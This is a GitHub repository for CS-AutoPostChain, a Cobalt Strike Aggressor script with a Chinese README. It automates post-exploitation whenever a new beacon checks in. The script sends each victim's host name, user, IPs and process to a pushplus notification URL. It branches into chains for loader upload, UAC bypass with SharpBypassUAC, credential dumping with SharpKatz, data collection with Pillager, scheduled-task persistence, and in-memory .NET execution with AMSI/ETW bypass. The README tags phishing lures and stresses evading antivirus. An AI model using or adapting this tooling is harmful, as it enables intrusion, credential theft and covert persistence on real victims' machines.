├── .gitignore ├── AutoPostChain.cna ├── README.md ├── dist ├── Pillager │ ├── Pillager.bin │ ├── scloader.x64.o │ └── scloader.x86.o ├── inlineExecute-Assembly │ ├── inlineExecute-Assembly.x64.o │ ├── inlineExecute-Assembly.x86.o │ └── inlineExecuteAssembly │ │ └── inlineExecute-Assembly.cna ├── ipconfig │ ├── ipconfig.x64.o │ └── ipconfig.x86.o ├── screenshot │ ├── screenshot.x64.obj │ └── screenshot.x86.obj └── whoami │ ├── whoami.x64.o │ └── whoami.x86.o ├── image ├── image-20240311202300031.png ├── image-20240311203426501.png ├── image-20240311203512109.png ├── image-20240311212850311.png ├── image-20240311213745013.png ├── image-20240311214005973.png ├── image-20240311214050853.png ├── image-20240311215101658.png └── image-20240311215420501.png └── scripts ├── Pillager.exe ├── SharpBypassUAC.exe ├── SharpHostInfo.exe ├── SharpKatz.exe └── SharpSchTask.exe
-------------------------------------------------------------------------------- /.gitignore: --------------------------------------------------------------------------------
.DS_Store

-------------------------------------------------------------------------------- /AutoPostChain.cna: --------------------------------------------------------------------------------
# AutoPostChain.cna — Cobalt Strike Aggressor (Sleep) script.
#
# On `beacon_initial` it reads the new beacon's metadata, counts the sessions
# already alive on the same host, pushes a check-in notification over HTTP
# (http_get) and then dispatches to NormalUser_Chain / BypassUAC /
# OnlyAdmin_Chain. As shipped every step inside those three subs is commented
# out, so the script only logs and notifies.
#
# Handling note: $pushplusToken / $serverchanKey are credentials stored in this
# file, and $onlineUrl below embeds the token plus the beacon's host name, user,
# internal/external IP, process and pid as URL query parameters sent to a
# third-party push service. Treat the script file and its console output as
# sensitive.

##### Parameter definitions
$cserverName = "APC";
$sleepTime = "0";
$pushplusToken = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx";
$serverchanKey = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx";

# Loader path
$LoaderName = "Update.exe";
$LoaderPath = "C:\\Users\\Public\\";
$LoaderFullPath = $LoaderPath.$LoaderName;
$b64encodeFullPath = "QzpcVXNlcnNcUHVibGljXFVwZGF0ZS5leGU=";

# Fetch the Beacon info that is needed
# NOTE(review): this runs at script-load time, outside any sub or event handler,
# so $1 is presumably unset here, and replace() is given a single argument while
# every other call in this file passes (value, " ", "_"). beacon_initial below
# reassigns $internalIP before anything reads it — confirm whether this line is
# needed at all.
$internalIP = replace(beacon_info($1, "internal"));

##### User execution-chain orchestration
# Steps that do not need admin rights. Every step is commented out as shipped,
# so NormalUser_Chain($1) is currently a no-op.
sub NormalUser_Chain {
    # UP_Loader($1);
    # beacon_inline_execute($1,readbof($1, "whoami"), "go", $null);
    # beacon_inline_execute($1,readbof($1, "ipconfig"), "go", $null);
    # beacon_inline_execute($1,readobj($1, "screenshot"), "go", $null);
    # inlineExecute-Assembly($1,script_resource("/scripts/SharpHostInfo.exe"), "-i $internalIP\/24");
}

# Commented out as shipped; currently a no-op.
sub BypassUAC {
    # inlineExecute-Assembly($1,script_resource("/scripts/SharpBypassUAC.exe"), "-b computerdefaults -e $b64encodeFullPath");
}

# Steps intended for admin sessions only. Commented out as shipped; currently a no-op.
sub OnlyAdmin_Chain {
    # inlineExecute-Assembly($1,script_resource("/scripts/SharpKatz.exe"), "");
    # Pillager($1);
    # inlineExecute-Assembly($1, script_resource("/scripts/SharpSchTask.exe"), "$LoaderFullPath 1");
}

##### ATT&CK function modules

# UP_Loader: cd the beacon to $LoaderPath, upload scripts/$LoaderName from the
# script's directory, and log progress to the beacon console.
#   $1 - beacon id
sub UP_Loader {
    bcd($1, $LoaderPath);
    blog($1,"\c9开始上传 Loader");
    bupload($1, script_resource("/scripts/".$LoaderName));
    # bshell($1, "attrib.exe +h $LoaderName");
    blog($1, "\c8Loader 文件上传完成");
    blog($1, "\c8Loader文件位置:$LoaderFullPath");
}

# Pillager: read dist/Pillager/scloader.<arch>.o and dist/Pillager/Pillager.bin
# from the script's directory, pack Pillager.bin as a single "b" argument and
# run the loader object through beacon_inline_execute.
#   $1 - beacon id (architecture is taken from barch($1))
# NOTE(review): unlike readbof/readobj below, an empty read is not checked here;
# $bid/$barch/$handle1/$data1/... are not declared local().
sub Pillager {
    $bid = $1;
    $barch = barch($bid);

    $handle1 = openf(script_resource("dist/Pillager/scloader. $+ $barch $+ .o"));
    $data1 = readb($handle1, -1);
    closef($handle1);

    $handle2 = openf(script_resource("dist/Pillager/Pillager.bin"));
    $data2 = readb($handle2, -1);
    closef($handle2);

    $args = bof_pack($bid, "b", $data2);
    beacon_inline_execute($bid, $data1, "go", $args);
    btask($1, "\c9敏感信息收集完成 文件打包至用户目录:\\AppData\\Local\\Temp\\Pillager.zip");
}

###### Helper function definitions

# Note: attach a beacon note based on the global $processName, which
# beacon_initial sets from beacon_info($1, "process") before calling Note($1).
# Process names not listed here get no note.
#   $1 - beacon id
sub Note {
    if ($processName eq "beacon.exe") {
        bnote($1, "test");
    }
    else if ($processName eq "个人简历.exe") {
        bnote($1, "XX单位社工钓鱼");
    }
    else if ($processName eq "javaEE.exe") {
        bnote($1, "维权上线");
    }
    else if ($processName eq "svchost.exe") {
        bnote($1, "SchTask维权上线");
    }
    else if ($processName eq "Update.exe") {
        bnote($1, "BypassUAC上线");
    }
}

##### HTTP GET module
# http_get: open $1 with java.net.URL, read the whole response and print it to
# the script console (agscript / Script Console), one line per "\r\n".
#   $1 - full URL, including any query string
# NOTE(review): no try/catch around openStream — a network or TLS failure
# presumably surfaces as a script error inside beacon_initial; confirm how the
# caller should behave when the notification endpoint is unreachable.
sub http_get {
    local('$output');
    $url = [new java.net.URL: $1];
    $stream = [$url openStream];
    $handle = [SleepUtils getIOHandle: $stream, $null];

    @content = readAll($handle);

    foreach $line (@content) {
        $output .= $line . "\r\n";
    }
    println($output);
}

##### BOF loading
# readbof: load dist/<name>/<name>.<arch>.o relative to this script and return
# its bytes; the resolved path is also printed to the script console.
#   $1 - beacon id (architecture is taken from barch($1))
#   $2 - BOF name, used both as the directory and the file stem
# Returns the file contents, or an empty value when nothing could be read.
# NOTE(review): on an empty read berror() is reported but there is no early
# return — the btask line still fires and the caller receives empty $data.
sub readbof {
    local('$barch $handle $data $args');
    $barch = barch($1);

    # read in the right BOF file
    println(script_resource("/dist/$2 $+ / $+ $2 $+ . $+ $barch $+ .o"));
    $handle = openf(script_resource("/dist/$2 $+ / $+ $2 $+ . $+ $barch $+ .o"));
    $data = readb($handle, -1);
    closef($handle);
    if(strlen($data) == 0)
    {
        berror($1, "[-] Error: BOF bin could not be found. Please ensure the compiled BOF (.o file) exists in the same folder as this aggressor script.");
    }

    # announce what we're doing
    btask($1, "AutoChain is Running BOF $2");
    return $data;
}
# readobj: same as readbof but for objects named <name>.<arch>.obj
# (the screenshot BOF in dist/ uses that extension).
#   $1 - beacon id
#   $2 - BOF name
# Returns the file contents, or an empty value when nothing could be read
# (same no-early-return behaviour as readbof).
sub readobj {
    local('$barch $handle $data $args');
    $barch = barch($1);

    # read in the right BOF file
    println(script_resource("/dist/$2 $+ / $+ $2 $+ . $+ $barch $+ .obj"));
    $handle = openf(script_resource("/dist/$2 $+ / $+ $2 $+ . $+ $barch $+ .obj"));
    $data = readb($handle, -1);
    closef($handle);
    if(strlen($data) == 0)
    {
        berror($1, "[-] Error: BOF bin could not be found. Please ensure the compiled BOF (.obj file) exists in the same folder as this aggressor script.");
    }

    # announce what we're doing
    btask($1, "AutoChain is Running BOF(.obj) $2");
    return $data;
}

##### inlineExecute-Assembly module

# NOTE(review): only $etw, $amsi, $appDomain and $version are declared global;
# $revertETW, $mailSlot, $entryPoint, $pipeName and $mailSlotName are assigned
# below without a global() declaration.
global('$etw $amsi $appDomain $version');

#Global vars don't change
$etw = 1;
$revertETW = 0;
$amsi = 1;
$mailSlot = 1;
$entryPoint = 1;

#Default values set here - if you don't want to use flags to change -> change here
$appDomain = "DefaultDomain";
$pipeName = "DefaultPipe";
$mailSlotName = "DefaultMailSlot";
# Example: inlineExecute-Assembly($1,script_resource("/scripts/SharpHunter.exe"), "run \"whoami /all\"");

# inlineExecute-Assembly: read a .NET assembly from disk, pack it together with
# the AMSI/ETW/AppDomain/pipe/mailslot settings, and run the
# inlineExecute-Assembly BOF (loaded via readbof) in the beacon.
#   $1 - beacon id
#   $2 - path to the assembly on the operator's machine (used as the default
#        for --dotnetassembly)
#   $3 - argument string for the assembly (base of $_assemblyWithArgs)
# Returns nothing; berror() and return on an empty or non-existent path.
#
# The body is adapted from the upstream inlineExecute-Assembly.cna alias. It
# still parses $0 for --flags, but in this file the function is called as a
# plain sub. NOTE(review): $0 is presumably the function name rather than a
# command line when invoked this way, so @args is likely empty and the
# defaults plus $2/$3 are what actually take effect — confirm.
sub inlineExecute-Assembly {

    $data = substr($0, 23);
    @args = split(' ', $data);

    local('$_amsi $_etw $_revertETW $_appDomain $_dotNetAssembly $_version $_assemblyargs $_assemblyWithArgs $_entryPoint $_mailSlot $_mailSlotName $_mailSlotNameArgs $_pipeName $_pipeNameArgs');

    # Per-call defaults. Unlike upstream (which starts every value at ""),
    # amsi/etw/mailSlot already default to 1 here, so the bare --amsi / --etw
    # flags below change nothing.
    $_amsi = 1;
    $_etw = 1;
    $_revertETW = 0;
    $_mailSlot = 1;
    $_mailSlotName = "DefaultMailSlot";
    $_mailSlotNameArgs = "";
    $_pipeName = "DefaultPipe";
    $_pipeNameArgs = "";
    $_entryPoint = 1;
    $_appDomain = "DefaultDomain";
    $_appDomainArgs = "";
    $_dotNetAssembly = $2;
    $_dotNetAssemblyArgs = $3;
    $_assemblyWithArgs = $_dotNetAssemblyArgs;

    @CliOptions = @("--amsi", "--etw", "--revertetw", "--dotnetassembly", "--assemblyargs", "--appdomain", "--pipe", "--mailslot", "--main");

    # Flag parser. Each value-taking option (--assemblyargs, --appdomain,
    # --mailslot, --pipe) collects tokens into its @_... array until the next
    # token that is itself one of @CliOptions. A token containing a quote is
    # joined with the following tokens up to and including the next token that
    # contains a quote (stopping early if the accumulated value already ends
    # with one), so a quoted phrase with spaces becomes a single element.
    # $count/$j/$k are not declared local().
    for ($i = 0; $i < size(@args); $i++){

        if (@args[$i] iswm "--etw"){
            $_etw = 1;
        }else if (@args[$i] iswm "--amsi"){
            $_amsi = 1;
        }else if (@args[$i] iswm "--revertetw"){
            $_revertETW = 1;
        }else if (@args[$i] iswm "--main"){
            $_entryPoint = int(0);
        }else if (@args[$i] iswm "--dotnetassembly"){
            $i = $i + 1;
            $_dotNetAssembly = @args[$i];
        }else if (@args[$i] iswm "--assemblyargs"){
            $i = $i + 1;
            $count = 0;
            for ($j = $i; $j < size(@args); $j++){
                if(@args[$j] in @CliOptions){
                    break;
                }else{
                    @_dotNetAssemblyArgs[$count] = @args[$j];

                    #Taking care of arguments embedded within single/double quotes and consider it as one single argument (disregarding spaces).
                    if(('"' isin @_dotNetAssemblyArgs[$count] || "'" isin @_dotNetAssemblyArgs[$count])){

                        $k = 0;
                        $j = $j + 1;

                        for($k = $j; $k < size(@args); $k++){
                            if(lindexOf(@_dotNetAssemblyArgs[$count], '"') == (strlen(@_dotNetAssemblyArgs[$count]) - 1) || lindexOf(@_dotNetAssemblyArgs[$count], "'") == (strlen(@_dotNetAssemblyArgs[$count]) - 1)){
                                $k = $k - 1;
                                break;
                            }
                            if('"' isin @args[$k] || "'" isin @args[$k]){
                                @_dotNetAssemblyArgs[$count] = @_dotNetAssemblyArgs[$count]." ".@args[$k];
                                break;
                            }else{
                                @_dotNetAssemblyArgs[$count] = @_dotNetAssemblyArgs[$count]." ".@args[$k];
                            }
                        }
                        $j = $k;
                        $i = $k;
                    }
                    $count = $count + 1;
                }
            }
        }else if (@args[$i] iswm "--appdomain"){
            $i = $i + 1;
            $count = 0;
            for ($j = $i; $j < size(@args); $j++){
                if(@args[$j] in @CliOptions){
                    break;
                }else{
                    @_appDomain[$count] = @args[$j];

                    #Taking care of arguments embedded within single/double quotes and consider it as one single argument (disregarding spaces).
                    if(('"' isin @_appDomain[$count] || "'" isin @_appDomain[$count])){

                        $k = 0;
                        $j = $j + 1;

                        for($k = $j; $k < size(@args); $k++){
                            if(lindexOf(@_appDomain[$count], '"') == (strlen(@_appDomain[$count]) - 1) || lindexOf(@_appDomain[$count], "'") == (strlen(@_appDomain[$count]) - 1)){
                                $k = $k - 1;
                                break;
                            }
                            if('"' isin @args[$k] || "'" isin @args[$k]){
                                @_appDomain[$count] = @_appDomain[$count]." ".@args[$k];
                                break;
                            }else{
                                @_appDomain[$count] = @_appDomain[$count]." ".@args[$k];
                            }
                        }

                        $j = $k;
                        $i = $k;
                    }
                    $count = $count + 1;
                }
            }
        }else if (@args[$i] iswm "--mailslot"){
            $_mailSlot = 1;
            $i = $i + 1;
            $count = 0;
            for ($j = $i; $j < size(@args); $j++){
                if(@args[$j] in @CliOptions){
                    break;
                }else{
                    @_mailSlotName[$count] = @args[$j];

                    #Taking care of arguments embedded within single/double quotes and consider it as one single argument (disregarding spaces).
                    if(('"' isin @_mailSlotName[$count] || "'" isin @_mailSlotName[$count])){

                        $k = 0;
                        $j = $j + 1;

                        for($k = $j; $k < size(@args); $k++){
                            if(lindexOf(@_mailSlotName[$count], '"') == (strlen(@_mailSlotName[$count]) - 1) || lindexOf(@_mailSlotName[$count], "'") == (strlen(@_mailSlotName[$count]) - 1)){
                                $k = $k - 1;
                                break;
                            }
                            if('"' isin @args[$k] || "'" isin @args[$k]){
                                @_mailSlotName[$count] = @_mailSlotName[$count]." ".@args[$k];
                                break;
                            }else{
                                @_mailSlotName[$count] = @_mailSlotName[$count]." ".@args[$k];
                            }
                        }
                        $j = $k;
                        $i = $k;
                    }
                    $count = $count + 1;
                }
            }
        }else if (@args[$i] iswm "--pipe"){
            $i = $i + 1;
            $count = 0;
            for ($j = $i; $j < size(@args); $j++){
                if(@args[$j] in @CliOptions){
                    break;
                }else{
                    @_pipeName[$count] = @args[$j];

                    #Taking care of arguments embedded within single/double quotes and consider it as one single argument (disregarding spaces).
                    if(('"' isin @_pipeName[$count] || "'" isin @_pipeName[$count])){

                        $k = 0;
                        $j = $j + 1;

                        for($k = $j; $k < size(@args); $k++){
                            if(lindexOf(@_pipeName[$count], '"') == (strlen(@_pipeName[$count]) - 1) || lindexOf(@_pipeName[$count], "'") == (strlen(@_pipeName[$count]) - 1)){
                                $k = $k - 1;
                                break;
                            }
                            if('"' isin @args[$k] || "'" isin @args[$k]){
                                @_pipeName[$count] = @_pipeName[$count]." ".@args[$k];
                                break;
                            }else{
                                @_pipeName[$count] = @_pipeName[$count]." ".@args[$k];
                            }
                        }

                        $j = $k;
                        $i = $k;
                    }

                    $count = $count + 1;

                }
            }
        }
    }

    # Appending .NET assembly arguments to $_assemblyWithArgs var (separated by " ")
    # $_assemblyWithArgs starts as $3, so parsed --assemblyargs tokens are
    # appended after the string the caller passed.

    for ($i = 0; $i < size(@_dotNetAssemblyArgs); $i++){
        if (@_dotNetAssemblyArgs[$i] ne "") {
            if ($_assemblyWithArgs ne "")
            {
                $_assemblyWithArgs = $_assemblyWithArgs." ".@_dotNetAssemblyArgs[$i];
            }
            else
            {
                $_assemblyWithArgs = @_dotNetAssemblyArgs[$i];
            }
        }
    }

    # Appending appDomain arguments to $_appDomainArgs var (separated by " ")

    for ($i = 0; $i < size(@_appDomain); $i++){
        if (@_appDomain[$i] ne "") {
            if ($_appDomainArgs ne "")
            {
                $_appDomainArgs = $_appDomainArgs." ".@_appDomain[$i];
            }
            else
            {
                $_appDomainArgs = @_appDomain[$i];
            }
        }
    }

    # Appending mailSlot arguments to $_mailSlotNameArgs var (separated by " ")

    for ($i = 0; $i < size(@_mailSlotName); $i++){
        if (@_mailSlotName[$i] ne "") {
            if ($_mailSlotNameArgs ne "")
            {
                $_mailSlotNameArgs = $_mailSlotNameArgs." ".@_mailSlotName[$i];
            }
            else
            {
                $_mailSlotNameArgs = @_mailSlotName[$i];
            }
        }
    }

    # Appending pipeName arguments to $_pipeNameArgs var (separated by " ")

    for ($i = 0; $i < size(@_pipeName); $i++){
        if (@_pipeName[$i] ne "") {
            if ($_pipeNameArgs ne "")
            {
                $_pipeNameArgs = $_pipeNameArgs." ".@_pipeName[$i];
            }
            else
            {
                $_pipeNameArgs = @_pipeName[$i];
            }
        }
    }

    # Fall back to the script-level globals for anything the flags left unset.
    # Only $_entryPoint keeps its parsed value when --main was given (int(0)).
    if ($_appDomainArgs eq "") {
        $_appDomainArgs = $appDomain;
    }
    if ($_mailSlotNameArgs eq "") {
        $_mailSlotNameArgs = $mailSlotName;
    }
    if ($_pipeNameArgs eq "") {
        $_pipeNameArgs = $pipeName;
    }
    if ($_amsi == "") {
        $_amsi = $amsi;
    }
    if ($_etw == "") {
        $_etw = $etw;
    }
    if ($_revertETW == "") {
        $_revertETW = $revertETW;
    }
    if ($_entryPoint ne int(0)) {
        $_entryPoint = $entryPoint;
    }
    if ($_mailSlot == "") {
        $_mailSlot = $mailSlot;
    }

    # Error Handling

    $assemblyPath = $_dotNetAssembly;
    $bid = $1;
    if ($assemblyPath eq "") {
        berror($bid, "Run 'help inlineExecute-Assembly'\n");
        return;
    }

    if (!-exists $assemblyPath || !-isFile $assemblyPath){
        berror($bid, "File ".$assemblyPath." doesn't exist\n");
        return;
    }

    # Reading assembly bytes and get the size in bytes
    $fileHandle = openf($_dotNetAssembly);
    $assemblyLength = lof($_dotNetAssembly);
    $assemblyBytes = readb($fileHandle, -1);
    closef($fileHandle);

    # pack our arguments
    # Format "ziiiiizzzib" matches the 11 values in order: appDomain, amsi, etw,
    # revertETW, mailSlot, entryPoint, mailSlotName, pipeName, assembly args,
    # assembly length, assembly bytes.
    $bofArgs = bof_pack($1, "ziiiiizzzib", $_appDomainArgs, $_amsi, $_etw, $_revertETW, $_mailSlot, $_entryPoint, $_mailSlotNameArgs, $_pipeNameArgs, $_assemblyWithArgs, $assemblyLength, $assemblyBytes);
    # execute it.
    # readbof resolves dist/inlineExecute-Assembly/inlineExecute-Assembly.<arch>.o
    beacon_inline_execute($1, readbof($1, "inlineExecute-Assembly"), "go", $bofArgs);
    btask($1, "\c9InlineExecute-Assembly $2 $3");

    # Reset the parsed-argument arrays (they are not declared local()).
    clear(@_assemblyWithArgs);
    clear(@_dotNetAssemblyArgs);
    clear(@_appDomainArgs);
    clear(@_appDomain);
    clear(@_mailSlotNameArgs);
    clear(@_mailSlotName);
    clear(@_pipeNameArgs);
    clear(@_pipeName);
}

action("\c8* AutoPostChain - Aggressor Load Success!");

##### Automated chain orchestration
# beacon_initial: runs once for each new beacon ($1 = its id).
#  1. reads the beacon's metadata into script-level globals ($internalIP,
#     $computerName, $processName, ... — Note() relies on $processName);
#  2. builds $onlineUrl (pushplus notification carrying the token and the
#     metadata as query parameters);
#  3. counts live sessions on the same host: $x = all, $y = admin, $z = $x - $y;
#  4. branches on -isadmin and on those counts, notifying via http_get and
#     calling the (currently empty) chain subs or logging the live list.
on beacon_initial {

    blog($1,"\c9Automated Post Exploitation Chain (@lintstar)");

    # Collect host information (spaces replaced with "_")
    # $listennerName and $archName are assigned but not read anywhere below.
    $internalIP = replace(beacon_info($1, "internal"), " ", "_");
    $externalIP = replace(beacon_info($1, "external"), " ", "_");
    $computerName = replace(beacon_info($1, "computer"), " ", "_");
    $userName = replace(beacon_info($1, "user"), " ", "_");
    $listennerName = replace(beacon_info($1, "listener"), " ", "_");
    $processName = replace(beacon_info($1, "process"), " ", "_");
    $pidName = replace(beacon_info($1, "pid"), " ", "_");
    $archName = replace(beacon_info($1, "arch"), " ", "_");
    # Notification URL: the token and all of the metadata above travel in the
    # query string to www.pushplus.plus (see the file header). The serverchan
    # variant below is an alternative and is commented out.
    $onlineUrl = 'https://www.pushplus.plus/send?token='.$pushplusToken.'&title=%5B'.$cserverName.'%5D%20%E5%92%AC%E9%92%A9%20%F0%9F%8E%AE%20'.$processName.'&template=markdown&content=HostName%3A%20'.$computerName.'%0A%0AExternal%3A%20'.$externalIP.'%0A%0AInternal%3A%20'.$internalIP.'%0A%0AUserName%3A%20'.$userName.'%0A%0AProcess%3A%20'.$processName.'%0A%0APid%3A%20'.$pidName;
    # $onlineUrl = 'https://sctapi.ftqq.com/'.$serverchanKey.'.send?text=CobaltStrike%e4%b8%8a%e7%ba%bf%e6%8f%90%e9%86%92&desp=%e4%bb%96%e6%9d%a5%e4%ba%86%e3%80%81%e4%bb%96%e6%9d%a5%e4%ba%86%ef%bc%8c%e4%bb%96%e8%84%9a%e8%b8%8f%e7%a5%a5%e4%ba%91%e8%b5%b0%e6%9d%a5%e4%ba%86%e3%80%82%0D%0A%0D%0Aip:'.$internalIP.'%0D%0A%0D%0A%e7%94%a8%e6%88%b7%e5%90%8d:'.$userName.'%0D%0A%0D%0A%e8%ae%a1%e7%ae%97%e6%9c%ba%e5%90%8d:'.$computerName;


    println('=================================================================================================================');
    println('[+] '.formatDate('MM/dd/yyyy HH:mm:ss (z)').' IP:'.$internalIP.' UserName:'.$userName.' ComputerName:'.$computerName);

    ###### Live-session counting logic

    # $x: live sessions on this host, $y: of those, admin sessions, $z: $x - $y
    $x = 0;
    $y = 0;
    $z = 0;

    foreach $bid (beacon_ids()) {

        # Per-bid host information
        $inIP = replace(beacon_info($bid, "internal"), " ", "_");
        $uName = replace(beacon_info($bid, "user"), " ", "_");
        $prName = replace(beacon_info($bid, "process"), " ", "_");
        $piName = replace(beacon_info($bid, "pid"), " ", "_");
        $hName = replace(beacon_info($bid, "computer"), " ", "_");
        $lastTime = replace(beacon_info($bid, "last"), " ", "_");

        # Only beacons that are active and whose "last" value is <= 60000
        # count as alive. NOTE(review): "last" is presumably milliseconds since
        # the last check-in — confirm the unit.
        if (-isactive $bid && $lastTime <= 60000) {

            # The @ip/@pid/@pro/@last/@un lists are indexed by $x, which is only
            # advanced for same-host beacons, so entries for other hosts are
            # overwritten by the next same-host match.
            @ip[$x] = $inIP;
            @pid[$x] = $piName;
            @pro[$x] = $prName;
            @last[$x] = $lastTime;
            @un[$x] = $uName;

            # If this beacon's host name and internal IP match the current session's, x+1
            if ($hName eq $computerName && $inIP eq $internalIP) {

                $x = $x + 1;

                # If it is an admin session, y+1
                if (-isadmin $bid) {
                    $y = $y + 1;
                }
                # NOTE(review): no trailing semicolon on this statement — check
                # that the Sleep parser accepts it in this position.
                $z = $x - $y
            }
        }
    }

    blog($1, "\c8=====================");
    blog($1, "\c8当前主机总存活数: $+ $x");
    blog($1, "\c8管理员权限会话存活数: $+ $y");
    blog($1, "\c8用户权限会话存活数: $+ $z");
    blog($1, "\c8=====================");

    ###### Scenario flow orchestration

    Note($1);
    # bsleep($1, $sleepTime);
    # The new beacon itself is included in $x/$y/$z, so "$x < 2" means it is
    # the only live session on this host.
    if (!-isadmin $1) {
        http_get($onlineUrl);
        blog($1, "\c9普通用户权限");

        # Fresh check-in with normal-user privileges
        if ($x < 2) {
            NormalUser_Chain($1);
            BypassUAC($1);

        # Repeated check-in with normal-user privileges
        }else{
            blog($1, "\cB当前主机存活数大于等于2 请检查是否已提升至管理员权限 [ AutoPostChain End ]");
            blog($1, "\c9存活列表:\nIP: ".replace(@ip, "@", "")."\n进程名: ".replace(@pro, "@", "")."\n进程号: ".replace(@pid, "@", "")."\n心跳: ".replace(@last, "@", "")."\n用户名: ".replace(@un, "@", ""));
        }

    } else {
        http_get($onlineUrl);
        blog($1, "\c9管理员权限");

        # Admin session obtained via UAC bypass from a normal-user session
        if ($y < 2 && $z > 0) {
            blog($1, "\c8该管理员会话为普通用户通过绕 UAC 上线 不再进行 UAC Bypass");
            OnlyAdmin_Chain($1);

        # Fresh check-in with admin privileges
        } else if ($y < 2 && $z < 1) {
            NormalUser_Chain($1);
            OnlyAdmin_Chain($1);

        # Repeated check-in with admin privileges
        }else {
            blog($1, "\cB该IP存活数量大于2 且已经存在管理员权限会话 [ AutoPostChain End ]");
            # NOTE(review): this line prints @prName and @lastTime where the
            # normal-user branch above prints @pid and @last; the @-sigil names
            # are presumably distinct from the $prName/$lastTime scalars set in
            # the loop, so the process-id and heartbeat columns are likely
            # empty here — confirm.
            blog($1, "\c9存活列表:\nIP: ".replace(@ip, "@", "")."\n进程名: ".replace(@pro, "@", "")."\n进程号: ".replace(@prName, "@", "")."\n心跳: ".replace(@lastTime, "@", "")."\n用户名: ".replace(@un, "@", ""));
        }
    }
}
-------------------------------------------------------------------------------- /README.md: --------------------------------------------------------------------------------
## CS-AutoPostChain

4 | 5 | **基于 OPSEC 的 CobaltStrike 后渗透自动化链** 6 | 7 | ![image-20240311202300031](image/image-20240311202300031.png) 8 | 9 | > 本项目结合 LSTAR - CobaltStrike 综合后渗透插件一起使用更佳:https://github.com/lintstar/LSTAR 10 | 11 | ## 🎉 项目简介 12 | 13 | **在攻防实战中发现存在以下困境:** 14 | 15 | 1. 鱼叉式水坑、社工钓鱼以及威胁猎捕场景下**上线时间不可控**,且无法二十四小时守在电脑附近,同时常见的自动权限维持插件需要提前在目标机器放置木马,并且存在维权上线然后**重复维权的套娃问题** 16 | 2. 在 HW 场景下单个主机的信息收集、权限维持和凭据收集等大部分都是重复性操作,且进行 CS 多人协作时容易**重复收集降低效率** 17 | 3. 已有的自动化链(上线自动执行 whoami 截图等操作)大部分使用 brun、bshell、bspawn 等 CS 原生敏感命令,容易被杀软检测**关联到木马进程导致掉线**,已不适应如今的攻防场景 18 | 19 | **本项目尝试将后渗透攻击链中的部分人工重复性工作借助 CobaltStrike 转变为自动化并兼顾隐蔽性(Bypass):** 20 | 21 | - **遵循 OPSEC(Operations Security)原则,RedTeam 结合 C2 隐匿、木马免杀、工具魔改二开、BOF、自研工具/C2、ATT&CK 攻击手法等结合使用可构建完整的隐蔽自动化链** 22 | - **企业安全建设方面也可借此做自动化内网攻击编排进行内网终端侧、流量侧防护效果的验证。** 23 | 24 | ## 📜 免责声明 25 | 26 | **本项目仅适用于安全研究及合法的企业安全建设行为 一切后果及责任均由使用者本人承担** 27 | 28 | ## 🌟 功能特性 29 | 30 | - **敏感操作通过 BOF 和 C# 程序执行,避免文件落地以及隐蔽动态行为特征** 31 | - **上线主机结合智能化存活判断进行自动权限维持,杜绝重复上线** 32 | - **将 LSTAR 后渗透插件的功能函数化,为不同场景下编排定制化的自动化链提供便利** 33 | - **Bypass AV ① 动态查杀 ② Windows Defender 的 AMSI/ETW** 34 | - **C# 内存加载 + BOF + 定制化免杀工具及技术 = 无限可能** 35 | 36 | ## 🚀 流程编排 37 | 38 | **项目 CNA 脚本默认配置未做任何操作,仅做存活权限信息判断和控制台打印信息** 39 | 40 | **‼️ 请在理解原理的情况下结合实战需求进行合理配置,整体实现思路详见:https://xz.aliyun.com/t/14076** 41 | 42 | ### 上线微信通知 43 | 44 | 冲锋马上线时建议取消注释 bsleep,上线默认激活 Beacon 执行自动化链内容(等效控制台 Sleep0 命令) 45 | 46 | ![image-20240311212850311](image/image-20240311212850311.png) 47 | 48 | #### 配置 Token 49 | 50 | **http://www.pushplus.plus/push1.html 复制自己的 token 替换到参数定义的地方** 51 | 52 | ```shell 53 | $pushplusToken = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"; 54 | ``` 55 | 56 | Server 酱同理 57 | 58 | ```shell 59 | $serverchanKey = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"; 60 | ``` 61 | 62 | 根据需要注释对应配置代码 63 | 64 | ![image-20240311213745013](image/image-20240311213745013.png) 65 | 66 | #### 服务端后台挂载 67 | 68 | 使用 agscript 在服务器端运行 cna 文件,和挂载 CobaltStrike 一样,把 cna 脚本也挂载到后台: 69 | 70 | ```shell 71 | root@VM-8-8-ubuntu:~# screen -S AutoPostChain 72 
| root@VM-8-8-ubuntu:~# ./agscript [host] [port] [user] [pass] 73 | ``` 74 | 75 | 这里 agscript 的用法为: 76 | 77 | ``` 78 | ./agscript [host] [port] [user] [pass] 79 | ``` 80 | 81 | - [host] # 服务器的 ip 地址。 82 | - [port] # cs 的端口号,启动 cs 时有显示。 83 | - [user] # 后台挂载脚本时连接到 teamserver 的用户名。 84 | - [pass] # 启动服务端 cs 时设置的密码。 85 | - [path] # cna 文件的路径。 86 | 87 | ### 上线提醒标记 88 | 89 | 除去常规提醒外,当有多台 C2 服务器时,配置好 cserverName 参数可以在通知标题进行上线提醒的区分: 90 | 91 | ```shell 92 | $cserverName = "AT"; 93 | ``` 94 | 95 | ![image-20240311203426501](image/image-20240311203426501.png) 96 | 97 | 攻防场景下可通过上线进程来自动标记是针对哪个目标的终端权限上线了: 98 | 99 | ```shell 100 | sub Note { 101 | if ($processName eq "beacon.exe") { 102 | bnote($1, "test"); 103 | } 104 | else if ($processName eq "个人简历.exe") { 105 | bnote($1, "XX单位社工钓鱼"); 106 | } 107 | else if ($processName eq "javaEE.exe") { 108 | bnote($1, "维权上线"); 109 | } 110 | else if ($processName eq "Update.exe") { 111 | bnote($1, "BypassUAC上线"); 112 | } 113 | } 114 | ``` 115 | 116 | ![image-20240311203512109](image/image-20240311203512109.png) 117 | 118 | ### 智能化权限维持 119 | 120 | **‼️ 相关工具脚本只做示例演示,请使用本项目时结合实战场景进行针对性免杀和二次开发** 121 | 122 | #### 配置Loader 123 | 124 | 制作好免杀的维权马后放到 scripts 目录下,配置以下参数: 125 | 126 | ```shell 127 | # Loader 路径 128 | $LoaderName = "Update.exe"; 129 | $LoaderPath = "C:\\Users\\Public\\"; 130 | $LoaderFullPath = $LoaderPath.$LoaderName; 131 | $b64encodeFullPath = "QzpcVXNlcnNcUHVibGljXFVwZGF0ZS5leGU="; 132 | ``` 133 | 134 | `$b64encodeFullPath` 为维权马 Windows 完整路径 `C:\\Users\\Public\\Update.exe` Base64 加密后的内容,只是为了配合 SharpBypassUAC 工具参数输入,实际情况请替换其他动态行为免杀的 BypassUAC 程序。 135 | 136 | 